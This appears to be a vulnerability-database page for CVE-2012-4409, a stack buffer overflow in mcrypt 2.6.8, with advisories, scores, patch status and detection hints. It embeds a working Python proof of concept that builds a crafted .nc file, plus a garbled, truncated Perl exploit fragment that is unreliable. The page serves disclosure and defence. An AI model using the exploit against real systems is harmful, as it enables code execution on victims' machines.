CVE-2012-4409
published 2012-11-21CVE-2012-4409: Stack-based buffer overflow in the check_file_head function in extra.c in mcrypt 2.6.8 and earlier allows user-assisted remote attackers to execute arbitrary…
PriorityP344medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
15.02%
96.3th percentile
Stack-based buffer overflow in the check_file_head function in extra.c in mcrypt 2.6.8 and earlier allows user-assisted remote attackers to execute arbitrary code via an encrypted file with a crafted header containing long salt data that is not properly handled during decryption.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | mcrypt | < mcrypt 2.6.8-1.1 (bookworm) | mcrypt 2.6.8-1.1 (bookworm) |
| mcrypt | mcrypt | <= 2.6.8 | — |
| mcrypt | mcrypt | — | — |
| mcrypt | mcrypt | — | — |
| mcrypt | mcrypt | — | — |
| mcrypt | mcrypt | — | — |
| mcrypt | mcrypt | >= 0 < 2.6.8-1.1 | 2.6.8-1.1 |
| mcrypt | mcrypt | >= 0 < 2.6.8-1.1 | 2.6.8-1.1 |
| mcrypt | mcrypt | >= 0 < 2.6.8-1.1 | 2.6.8-1.1 |
| mcrypt | mcrypt | >= 0 < 2.6.8-1.1 | 2.6.8-1.1 |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
\x00\x6d\x03\x40\x73\x65\x72\x70\x65\x6e\x74\x00\x20\x00\x63\x62\x63\x00\x6d\x63\x72\x79\x70\x74\x2d\x73\x68\x61\x31\x00
- →The exploit triggers a stack-based buffer overflow in check_file_head() when mcrypt decrypts a .nc file with a crafted header containing an oversized salt field (105+ bytes). Monitor for mcrypt -d invocations on .nc files, especially those with unusually large salt data in the header. ↗
- →The malicious .nc file header begins with the magic bytes \x00\x6d\x03 followed by crafted algorithm/mode strings and a salt length byte (0x69 = 105) with 105 'A' bytes of padding. Scan .nc files for headers where the salt length field exceeds expected bounds. ↗
- →If FORTIFY_SOURCE is enabled (e.g., on Fedora/RHEL builds), exploitation is reduced to a crash. Monitor for abnormal mcrypt process terminations (SIGABRT/SIGSEGV) as an indicator of attempted exploitation. ↗
- →Vulnerable function is check_file_head() in extra.c. Audit or instrument this function for salt buffer length checks when processing encrypted file headers. ↗
- ·The vulnerability affects mcrypt 2.6.8 and earlier (command-line tool, not the library). The attack requires user interaction — the victim must attempt to decrypt the crafted .nc file. ↗
- ·Debian fixed this in package version 2.6.8-1.1 across bookworm, bullseye, forky, sid, and trixie. Fedora/EPEL fixed it in mcrypt-2.6.8-9. Ensure patched versions are deployed. ↗
- ·A separate but related CVE (CVE-2012-4527) covers a stack overflow triggered by overly long filenames (~128 bytes) passed to mcrypt, distinct from the crafted .nc header salt overflow of CVE-2012-4409. ↗
CVSS provenance
nvdv2.06.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:P
osv6.8MEDIUM
vendor_debian6.8MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-x2pj-g5q5-wh2x: Stack-based buffer overflow in the check_file_head function in extra
ghsa_unreviewed·2022-05-17
CVE-2012-4409 [MEDIUM] CWE-119 GHSA-x2pj-g5q5-wh2x: Stack-based buffer overflow in the check_file_head function in extra
Stack-based buffer overflow in the check_file_head function in extra.c in mcrypt 2.6.8 and earlier allows user-assisted remote attackers to execute arbitrary code via an encrypted file with a crafted header containing long salt data that is not properly handled during decryption.
OSV
CVE-2012-4409: Stack-based buffer overflow in the check_file_head function in extra
osv·2012-11-21·CVSS 6.8
CVE-2012-4409 [MEDIUM] CVE-2012-4409: Stack-based buffer overflow in the check_file_head function in extra
Stack-based buffer overflow in the check_file_head function in extra.c in mcrypt 2.6.8 and earlier allows user-assisted remote attackers to execute arbitrary code via an encrypted file with a crafted header containing long salt data that is not properly handled during decryption.
Debian
CVE-2012-4409: mcrypt - Stack-based buffer overflow in the check_file_head function in extra.c in mcrypt...
vendor_debian·2012·CVSS 6.8
CVE-2012-4409 [MEDIUM] CVE-2012-4409: mcrypt - Stack-based buffer overflow in the check_file_head function in extra.c in mcrypt...
Stack-based buffer overflow in the check_file_head function in extra.c in mcrypt 2.6.8 and earlier allows user-assisted remote attackers to execute arbitrary code via an encrypted file with a crafted header containing long salt data that is not properly handled during decryption.
Scope: local
bookworm: resolved (fixed in 2.6.8-1.1)
bullseye: resolved (fixed in 2.6.8-1.1)
forky: resolved (fixed in 2.6.8-1.1)
sid: resolved (fixed in 2.6.8-1.1)
trixie: resolved (fixed in 2.6.8-1.1)
No detection rules found.
Exploit-DB
mcrypt 2.6.8 - Stack Buffer Overflow (PoC)
exploitdb·2012-11-26
CVE-2012-4409 mcrypt 2.6.8 - Stack Buffer Overflow (PoC)
mcrypt 2.6.8 - Stack Buffer Overflow (PoC)
---
#!/usr/bin/env python
# mcrypt <= 2.6.8 stack-based buffer overflow poc
# http://mcrypt.sourceforge.net/
# (the command line tool, not the library)
#
# date: 2012-09-04
# exploit author: _ishikawa
# tested on: ubuntu 12.04.1
# tech: it overflows in check_file_head() when decrypting .nc files with too long salt data
#
# shout-outs to all cryptoparty people
import sys
sprawl = 105
gibson = "\x00\x6d\x03\x40\x73\x65\x72\x70\x65\x6e\x74\x00\x20\x00\x63\x62"
gibson += "\x63\x00\x6d\x63\x72\x79\x70\x74\x2d\x73\x68\x61\x31\x00"
gibson += chr(sprawl)
gibson += ("A" * sprawl)
gibson += (chr(0) * 3)
try:
count0 = open("cyberpunk.nc", "wb")
count0.write(gibson)
count0.close()
except IOError:
print "file error"
sys.exit(1)
print "now run mcrypt -d
Exploit-DB
mcrypt 2.5.8 - Local Stack Overflow
exploitdb·2012-11-26·CVSS 6.8
CVE-2012-4409 [MEDIUM] mcrypt 2.5.8 - Local Stack Overflow
mcrypt 2.5.8 - Local Stack Overflow
---
#!/usr/bin/perl
# Title : mcrypt ', $filename);
print F $file;
close F;
}
sub build_file {
# magic
$file .= "\x00m\x03";
# flags
$file .= pack('C', 1 0xfe);
return $payload;
}
Bugzilla
CVE-2012-4527 mcrypt: stack-based buffer overflow by encryption / decryption of overly long file names
bugzilla·2012-10-18·CVSS 6.8
CVE-2012-4527 [MEDIUM] CVE-2012-4527 mcrypt: stack-based buffer overflow by encryption / decryption of overly long file names
CVE-2012-4527 mcrypt: stack-based buffer overflow by encryption / decryption of overly long file names
Created attachment 629285
patch to fix the buffer overflow
Description of problem:
A buffer overflow in mcrypt version 2.6.8 and earlier due to long filenames. If a user were tricked into attempting to encrypt/decrypt specially crafted long filename(s), this flaw would cause a stack-based buffer overflow that could potentially lead to arbitrary code execution.
Note that this is caught by FORTIFY_SOURCE, which renders this to being a crash-only bug on Fedora.
There are currently no upstream patches for this flaw.
Version-Release number of selected component (if applicable):
mcrypt-2.6.8-9.el6 (possibly others too).
How reproducible:
Run mcrypt with ~128 byte long file names.
Discus
Bugzilla
CVE-2012-4409 mcrypt: buffer overflow when processing encrypted file headers
bugzilla·2012-09-06·CVSS 6.8
CVE-2012-4409 [MEDIUM] CVE-2012-4409 mcrypt: buffer overflow when processing encrypted file headers
CVE-2012-4409 mcrypt: buffer overflow when processing encrypted file headers
A buffer overflow was reported [1],[2] in mcrypt version 2.6.8 and earlier due to a boundary error in the processing of an encrypted file (via the check_file_head() function in src/extra.c). If a user were tricked into attempting to decrypt a specially-crafted .nc encrypted flie, this flaw would cause a stack-based buffer overflow that could potentially lead to arbitrary code execution.
Note that this is caught by FORTIFY_SOURCE, which renders this to being a crash-only bug on Fedora.
There is currently no upstream patches for this flaw.
[1] https://secunia.com/advisories/50507/
[2] https://bugs.gentoo.org/show_bug.cgi?id=434112
Discussion:
Created mcrypt tracking bugs for this issue
Affects: fedora-all [bu
http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086519.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2012-September/087542.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2012-September/088281.htmlhttp://packetstormsecurity.org/files/116268/mcrypt-2.6.8-Buffer-Overflow-Proof-Of-Concept.htmlhttp://secunia.com/advisories/50507http://secunia.com/advisories/51010http://www.openwall.com/lists/oss-security/2012/09/06/4http://www.securitytracker.com/id?1027532https://bugzilla.redhat.com/show_bug.cgi?id=855029http://lists.fedoraproject.org/pipermail/package-announce/2012-September/086519.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2012-September/087542.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2012-September/088281.htmlhttp://packetstormsecurity.org/files/116268/mcrypt-2.6.8-Buffer-Overflow-Proof-Of-Concept.htmlhttp://secunia.com/advisories/50507http://secunia.com/advisories/51010http://www.openwall.com/lists/oss-security/2012/09/06/4http://www.securitytracker.com/id?1027532https://bugzilla.redhat.com/show_bug.cgi?id=855029
2012-11-21
Published